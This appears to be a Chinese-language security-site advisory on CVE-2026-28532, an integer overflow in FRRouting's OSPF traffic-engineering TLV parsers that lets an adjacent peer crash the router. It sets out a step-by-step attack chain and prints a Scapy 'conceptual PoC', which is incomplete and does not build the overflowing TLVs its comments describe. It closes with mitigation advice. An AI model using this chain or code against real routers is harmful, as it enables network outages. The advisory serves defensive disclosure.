CVE-2026-28532 CVSS 6.5 中危

CVE-2026-28532: FRRouting OSPF解析器整数溢出漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28532

漏洞类型

整数溢出

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FRRouting

漏洞概述

FRRouting 10.5.3 之前版本在 OSPF 流量工程和段路由 TLV 解析器中存在整数溢出漏洞。由于 uint16_t 变量截断 uint32_t 值，导致循环终止失效和指针越界。攻击者通过已建立的 OSPF 邻接发送特制数据包，可触发越界读取并导致路由器崩溃，造成拒绝服务。

技术细节

该漏洞位于 FRRouting 的七个 OSPF 流量工程和段路由 TLV 解析函数中。根本原因是代码使用 uint16_t 类型的累加器变量来累加 TLV_SIZE() 宏返回的 uint32_t 长度值。当累加值超过 65535 时，高位被截断，导致累加器回绕。这使得循环终止条件判断失败，而指针继续向后移动，导致不受控的越界内存读取。攻击者需先与受害者建立 OSPF 邻接关系，然后发送包含恶意 Type 10 或 Type 11 不透明 LSA 的 LS Update 数据包。这将触发漏洞，导致路由器进程崩溃，中断整个区域的网络服务。

攻击链分析

STEP 1

1. 侦察与定位

攻击者扫描网络，识别运行 FRRouting 且版本低于 10.5.3 的路由器。

STEP 2

2. 建立邻接

攻击者与目标路由器建立合法的 OSPF 邻接关系，这是利用该漏洞的前提条件（AV:A）。

STEP 3

3. 发送恶意数据包

攻击者发送精心构造的 OSPF LS Update 数据包，其中包含恶意的 Type 10 或 Type 11 不透明 LSA。

STEP 4

4. 触发溢出

目标路由器解析 LSA 时，TLV 解析器中的 uint16_t 累加器发生截断，导致循环条件失效。

STEP 5

5. 拒绝服务

发生越界内存读取，导致路由器进程崩溃，造成网络中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

from scapy.all import *

# This is a conceptual PoC for CVE-2026-28532
# It constructs a malicious OSPF LSA packet to trigger the integer overflow.

def send_exploit(target_ip, local_ip):
    # Construct OSPF Header
    ospf_header = OSPF_Hdr(src=local_ip)
    
    # Construct a malicious Opaque LSA (Type 10 or 11)
    # The Length field needs to be crafted to trigger the uint16_t overflow
    # in the TLV parser loop.
    
    # Example: Setting a large length that causes accumulation to wrap
    malicious_lsa = OSPF_LSA(type=10, ls_id=1, adv_rtr=local_ip, 
                             seq=0x80000001, age=1, 
                             # Payload simulates the crafted TLVs
                             data=b'\x00'*100) 
    
    # Encapsulate in OSPF LS Update
    ls_update = OSPF_LSUpd(ls_count=1, lsa_list=[malicious_lsa])
    
    # Send packet
    packet = IP(dst=target_ip)/ospf_header/ls_update
    send(packet)

print("Note: This PoC requires Scapy and an established OSPF adjacency.")

影响范围

FRRouting < 10.5.3

防御指南

临时缓解措施

在无法立即升级的情况下，建议通过 ACL 严格限制 OSPF 对等体的 IP 地址，阻止未授权设备建立邻接关系。同时，密切监控路由器日志和 CPU 使用率，以便在遭受攻击时快速响应。如果业务允许，可暂时禁用 OSPF 流量工程（TE）和段路由功能以规避风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表